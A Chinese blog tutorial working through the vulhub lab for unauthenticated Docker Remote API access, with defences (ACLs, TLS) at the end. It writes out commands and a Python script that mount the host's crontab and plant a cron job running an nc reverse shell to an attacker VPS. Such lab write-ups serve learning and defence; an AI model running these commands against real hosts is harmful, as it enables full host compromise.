目录

1、漏洞原理

2、环境搭建

3、未授权访问

4、通过crontab反弹宿主机shell

防御手段


今天继续学习各种未授权访问的知识和相关的实操实验,一共有好多篇,内容主要是参考先知社区的一位大佬的关于未授权访问的好文章,还有其他大佬总结好的文章:

我在这只是学习大佬总结好的相关的知识和实操实验,那么废话不多说,开整。

第六篇是关于Docker的未授权访问

Docker 信任 Docker 私库证书 docker授权_安全

1、漏洞原理

Docker 是一个开源的引擎可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器。

开发者在笔记本上编译测试通过的容器可以批量地在生产环境中部署包括 VMs、bare metal、OpenStack 集群和其他的基础应用平台Docker。

Docker Remote API 是一个取代远程命令行界面(rcli)的REST API。

存在问题的版本分别为 1.3 和 1.6因为权限控制等问题导致可以通过 docker client 或者 http 直接请求就可以访问这个 API,通过这个接口,我们可以新建 container,删除已有 container,甚至是获取宿主机的 shell。

2、环境搭建

# 下载环境
mkdir docker
cd docker 
wget https://raw.githubusercontent.com/vulhub/vulhub/master/docker/unauthorized-rce/Dockerfile
wget https://raw.githubusercontent.com/vulhub/vulhub/master/docker/unauthorized-rce/docker-compose.yml
wget https://raw.githubusercontent.com/vulhub/vulhub/master/docker/unauthorized-rce/docker-entrypoint.sh

#或者利用DownGit下载https://github.com/vulhub/vulhub/blob/master/docker/unauthorized-rce
DownGit网址:https://minhaskamal.github.io/DownGit/#/home

 下载漏洞环境:

Docker 信任 Docker 私库证书 docker授权_容器_02

chmod 777 docker-entrypoint.sh # 给docker-entrypoint.sh权限
docker-compose build && docker-compose up -d # 编译并启动环境

 注:我的拉取环境好慢哟

Docker 信任 Docker 私库证书 docker授权_运维_03

但是最终还是拉取成功了

Docker 信任 Docker 私库证书 docker授权_安全_04

3、未授权访问

docker -H tcp://192.168.15.5:2375 version

Docker 信任 Docker 私库证书 docker授权_安全_05

可以看到成功的未授权访问到了版本信息

4、通过crontab反弹宿主机shell

下列操作均在攻击机上进行的操作:

vps监听9999端口

nc -lvnp 9999

Docker 信任 Docker 私库证书 docker授权_运维_06

启动容器 

docker -H tcp://192.168.15.5:2375 run -id -v /etc/crontabs:/tmp alpine:latest
docker -H tcp://192.168.15.5:2375 ps

Docker 信任 Docker 私库证书 docker授权_docker_07

 进入容器

docker -H tcp://192.168.15.5:2375 exec -it a8ff7ed880fb sh

Docker 信任 Docker 私库证书 docker授权_web安全_08

添加任务计划

echo '* * * * * /usr/bin/nc {vps_ip} 9999 -e /bin/sh' >> /tmp/root #添加计划任务

cat /tmp/root # 查看/tmp/root 文件

exit #退出容器

Docker 信任 Docker 私库证书 docker授权_安全_09

反弹宿主机shell

 

Docker 信任 Docker 私库证书 docker授权_web安全_10

可以看到攻击机(192.168,159.200)成功的反弹了ubuntu主机(192.168.159.202)的shell

也可以直接利用python脚本

import docker

client = docker.DockerClient(base_url='http://{target_ip}:2375/')
data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc {vps_ip} 9999 -e /bin/sh' >> /tmp/etc/crontabs/root" ''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw'}})

Docker 信任 Docker 私库证书 docker授权_docker_11

防御手段

  • -简单粗暴的方法,对2375端口做网络访问控制,如ACL控制,或者访问规则。
  • -修改docker swarm的认证方式,使用TLS认证:Overview Swarm with TLS 和 Configure Docker Swarm for TLS这两篇文档,说的是配置好TLS后,Docker CLI 在发送命令到docker daemon之前,会首先发送它的证书,如果证书是由daemon信任的CA所签名的,才可以继续执行。

到此,docker未授权访问最基础的知识也就学习完了,后面还有很多的未授权的知识等着我去学习,下次见(*^▽^*)